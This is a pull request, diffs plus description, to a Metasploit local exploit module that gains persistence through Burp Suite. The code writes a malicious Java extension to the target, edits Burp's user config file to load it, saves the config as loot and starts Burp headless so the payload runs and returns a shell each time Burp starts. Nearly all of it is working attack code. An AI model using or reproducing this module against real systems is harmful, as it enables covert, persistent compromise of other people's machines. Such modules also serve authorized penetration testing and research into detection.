### PR TITLE
Bumping up Burpsuite Persistence

### DIFF
--- a/modules/exploits/multi/local/burp_extension_persistence.rb
+++ b/modules/exploits/multi/local/burp_extension_persistence.rb
@@ -280,15 +280,16 @@ class MetasploitModule < Msf::Exploit::Local
       jar = compiled_extension(extension_name)
     end
 
-    vprint_status("Writing malcious extension to disk: #{extension_location}")
+    vprint_status("Writing malicious extension to disk: #{extension_location}")
 
-    write_file(extension_location, jar)
+    fail_with Failure::PayloadFailed,"Failed to write malicious extension" unless write_file(extension_location, jar)
     if datastore['CONFIG'].blank?
       print_good('Extension enabled, waiting for Burp to open with the config.')
     else
       vprint_status('Updating config file')
       add_extension(datastore['CONFIG'], extension_location, extension_name)
       print_good('Extension written to disk, waiting for Burp to open and user to install extension.')
+      cmd_exec("java -jar -Djava.awt.headless=true burpsuite_pro.jar")
     end
 
     # stolen from exploit/multi/handler

--- a/modules/exploits/multi/local/burp_extension_persistence.rb
+++ b/modules/exploits/multi/local/burp_extension_persistence.rb
@@ -44,9 +44,6 @@ class MetasploitModule < Msf::Exploit::Local
           # 'WfsDelay' => 90_000,
           'PrependMigrate' => true
         },
-        'Payload' => {
-          'BadChars' => '";\\'
-        },
         'Stance' => Msf::Exploit::Stance::Passive,
         'Passive' => true,
         'Targets' => [

--- a/modules/exploits/multi/local/burp_extension_persistence.rb
+++ b/modules/exploits/multi/local/burp_extension_persistence.rb
@@ -76,9 +76,9 @@ class MetasploitModule < Msf::Exploit::Local
 
     register_options([
       OptString.new('NAME', [ false, 'Name of the extension', '' ]),
-      OptString.new('CONFIG', [ false, 'Config file location on target', '' ]),
+      OptString.new('CONFIG_FILE', [ false, 'Config file location on target', '' ]),
+      OptString.new('BURP_JAR', [ false, 'Location of Burp JAR file', '' ]),
       OptString.new('WritableDir', [ true, 'A directory where we can write the extension']),
-      OptString.new('USER', [ false, 'User to target, or current user if blank', '' ]),
     ])
     register_advanced_options([
       OptString.new('GRADLE', [ false, 'Local Gradle executable', '/usr/bin/gradle' ]),
@@ -91,6 +91,71 @@ class MetasploitModule < Msf::Exploit::Local
     rand_text_alphanumeric(4..10)
   end
 
+  def get_home
+    return cmd_exec('echo %USERPROFILE%').strip if ['windows', 'win'].include? session.platform
+
+    return cmd_exec('echo ~').strip
+  end
+
+  def get_userconfig_path
+    if !datastore['CONFIG_FILE'].blank?
+      return nil if file?(datastore['CONFIG_FILE'])
+
+      return datastore['CONFIG_FILE']
+    end
+
+    home_path = get_home
+
+    path = (['windows', 'win'].include? session.platform) ? home_path + '\\AppData\\Roaming\\Burpsuite\\' : home_path + '/.BurpSuite/'
+    if file?(path + 'UserConfigPro.json')
+      @pro = true
+      return path + 'UserConfigPro.json'
+    end
+    return path + 'UserConfigCommunity.json' if file?(path + 'UserConfigCommunity.json')
+  end
+
+  def get_burp_executable
+    if !datastore['BURP_JAR'].blank?
+      return nil if file?(datastore['BURP_JAR'])
+
+      return datastore['BURP_JAR']
+    end
+
+    home_path = get_home
+
+    if @pro
+      burp_exec_path = (['windows', 'win'].include? session.platform) ? home_path + '\\AppData\\Local\\Programs\\BurpSuitePro\\burpsuite_pro.jar' : home_path + '/BurpSuitePro/burpsuite_pro.jar'
+    else
+      burp_exec_path = (['windows', 'win'].include? session.platform) ? home_path + '\\AppData\\Local\\Programs\\BurpSuiteCommunity\\burpsuite_community.jar' : home_path + '/BurpSuiteCommunity/burpsuite_community.jar'
+    end
+    return burp_exec_path if file?(burp_exec_path)
+  end
+
+  def modify_user_config(extension_location, extension_name)
+    user_config = read_file(@userconfig_path)
+
+    path = store_loot('burp.config.json', 'application/json', session, user_config, nil, nil)
+    print_good("Config file saved in: #{path}")
+    user_config_json = JSON.parse(user_config)
+    extensions_config = user_config_json.dig('user_options', 'extender', 'extensions')
+
+    fail_with Failure::PayloadFailed, 'Failed to get extension configuration' unless extensions_config
+
+    malicious_extension = {
+      'errors' => 'ui',
+      'extension_file' => extension_location,
+      'extension_type' => 'java',
+      'loaded' => true,
+      'name' => extension_name,
+      'output' => 'ui',
+      'use_ai' => false
+    }
+    extensions_config.unshift(malicious_extension)
+    user_config_json['user_options']['extender']['extensions'] = extensions_config
+
+    fail_with Failure::PayloadFailed, 'Module failed to overwrite UserConfig file' unless write_file(@userconfig_path, JSON.generate(user_config_json))
+  end
+
   def check
     if action.name == 'build'
       if File.exist?(datastore['GRADLE'])
@@ -100,24 +165,10 @@ class MetasploitModule < Msf::Exploit::Local
       end
     end
 
-    configs = get_configs_from_settings
-    configs.each do |config|
-      if file?(config)
-        print_status("Found config: #{config}")
-      else
-        print_status("Config mentioned in settings, but not found: #{config}")
-      end
-    end
+    @userconfig_path = get_userconfig_path
 
-    print_bad('User has no saved configs in their settings') if configs.empty?
-
-    if datastore['config'].blank?
-      return CheckCode::Detected('No config file listed, only writing plugin to disk')
-    elsif file?(datastore['config'])
-      return CheckCode::Detected("Config file found: #{datastore['config']}")
-    end
-
-    CheckCode::Safe("Config file not found: #{datastore['config']}")
+    CheckCode::Safe("Config file not found: #{datastore['config']}") unless @userconfig_path
+    CheckCode::Detected("Found UserConfig file #{@userconfig_path}")
   end
 
   def add_extension(settings_file, extension_location, extension_name)
@@ -147,56 +198,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
     # write json
     write_file(settings_file, JSON.pretty_generate(config_contents, { 'space' => '', 'indent' => ' ' * 4 }))
-  end
-
-  def target_user
-    return datastore['USER'] unless datastore['USER'].blank?
-
-    return cmd_exec('cmd.exe /c echo %USERNAME%').strip if ['windows', 'win'].include? session.platform
-
-    whoami
-  end
-
-  # windows stores these settings in the registry
-  # *nix stores them in a prefs.xml file
-  def get_configs_from_settings
-    me = target_user
-    config_files = []
-    if ['windows', 'win'].include? session.platform
-      key = 'HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\burp'
-      for i in 0..100 # place a hard upper limit just in case
-        value = registry_getvaldata(key, "free.suite.recent/Config/Files#{i}")
-
-        break if value.nil?
-
-        value = value.sub(%r{^/}, '') # remove leading slash. Example entry: /C:///Users//windows///Desktop//burp_user_settings.json
-        config_files << value
-      end
-    else
-      [
-        "/home/#{me}/.java/.userPrefs/burp/prefs.xml",
-        "/home/#{me}/.java/.userPrefs/burp/community/prefs.xml"
-      ].each do |f|
-        next unless file?(f)
-
-        vprint_status("Found config file: #{f}")
-        xml_content = read_file(f) # Replace with the path to your XML file
-
-        doc = Nokogiri::XML(xml_content)
-
-        # Extract entries from <map> where key starts with 'free.suite.recentConfigFiles'
-        # its an array so free.suite.recentConfigFiles1, free.suite.recentConfigFiles2, etc
-        entries = doc.xpath('//map/entry').select do |entry|
-          entry['key']&.start_with?('free.suite.recentConfigFiles')
-        end
-
-        # Get the values for those entries
-        entries.each do |entry|
-          config_files << entry['value']
-        end
-      end
-    end
-    config_files
   end
 
   def run_local_gradle_build(extension_name)
@@ -264,10 +265,26 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    # get UserConfig file path
+    unless @userconfig_path
+      get_userconfig_path
+    end
+
+    vprint_status("Burp UserConfig file: #{@userconfig_path}")
+    # get Burp executable
+    burp_path = get_burp_executable
+
+    fail_with Failure::NotFound, 'Burp JAR file was not found' unless burp_path
+
+    vprint_status("Burp JAR file: #{burp_path}")
+
     # RuntimeError `writable?' method does not support Windows systems
     if !['windows', 'win'].include?(session.platform) && !writable?(datastore['WritableDir'])
       fail_with(Failure::NotFound, "Unable to write to WritableDir: #{datastore['WritableDir']}")
     end
+
+    # create extension
+    print_status('Creating extension')
     extension_name = extension_name_generator
     print_status("Using extension name: #{extension_name}")
     extension_location = "#{datastore['WritableDir']}/#{extension_name}.jar"
@@ -280,17 +297,17 @@ class MetasploitModule < Msf::Exploit::Local
       jar = compiled_extension(extension_name)
     end
 
+    # store extension on target's machine
     vprint_status("Writing malicious extension to disk: #{extension_location}")
 
-    fail_with Failure::PayloadFailed,"Failed to write malicious extension" unless write_file(extension_location, jar)
-    if datastore['CONFIG'].blank?
-      print_good('Extension enabled, waiting for Burp to open with the config.')
-    else
-      vprint_status('Updating config file')
-      add_extension(datastore['CONFIG'], extension_location, extension_name)
-      print_good('Extension written to disk, waiting for Burp to open and user to install extension.')
-      cmd_exec("java -jar -Djava.awt.headless=true burpsuite_pro.jar")
-    end
+    fail_with Failure::PayloadFailed, 'Failed to write malicious extension' unless write_file(extension_location, jar)
+    # overwrite configuration
+    vprint_status('Modifying Burp configuration and adding malicious extension')
+    modify_user_config(extension_location, extension_name)
+
+    # run headless Burp
+    vprint_status('Running Burp in headless mode')
+    vprint_status("Running Burp JAR: #{cmd_exec("java -jar -Djava.awt.headless=true #{burp_path}")}")
 
     # stolen from exploit/multi/handler
     stime = Time.now.to_f
@@ -300,8 +317,5 @@ class MetasploitModule < Msf::Exploit::Local
 
       Rex::ThreadSafe.sleep(1)
     end
-
-    # config files must be applied, and on boot doesn't seem to work
-    # /usr/lib/jvm/java-23-openjdk-amd64/bin/java -jar -Xmx4g -Djava.awt.headless=true /usr/share/burpsuite/burpsuite.jar burp.StartBurp --user-config-file=/tmp/burp.json &
   end
 end


### PR DESCRIPTION
This adds an automatic way of executing the payload to get a shell directly. It stores the extension configuration in `UserConfigCommunity.json` or `UserConfigPro.json` to execute the payload every time Burp starts in the default configuration. It takes a few minutes to get a shell after starting Burp in headless mode.